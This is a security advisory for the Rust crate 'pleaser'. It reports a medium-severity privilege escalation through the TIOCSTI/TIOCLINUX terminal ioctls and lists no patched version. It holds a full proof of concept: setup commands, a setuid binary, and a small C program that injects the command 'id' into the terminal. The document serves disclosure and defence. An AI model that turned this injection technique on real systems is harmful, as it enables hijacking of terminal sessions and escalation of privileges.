- Reported
-
- Issued
-
- Package
-
pleaser
(crates.io)
- Type
-
Vulnerability
- Categories
-
- Aliases
-
- References
-
- CVSS Score
- 4.6
MEDIUM
- CVSS Details
-
- Attack vector
- Local
- Attack complexity
- Low
- Privileges required
- Low
- User interaction
- Required
- Scope
- Changed
- Confidentiality
- Low
- Integrity
- Low
- Availability
- None
- CVSS Vector
- CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- Patched
-
no patched versions
Description
please is vulnerable to privilege escalation using ioctls TIOCSTI
and TIOCLINUX on systems where they are not disabled.
Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
Advisory available under CC0-1.0
license.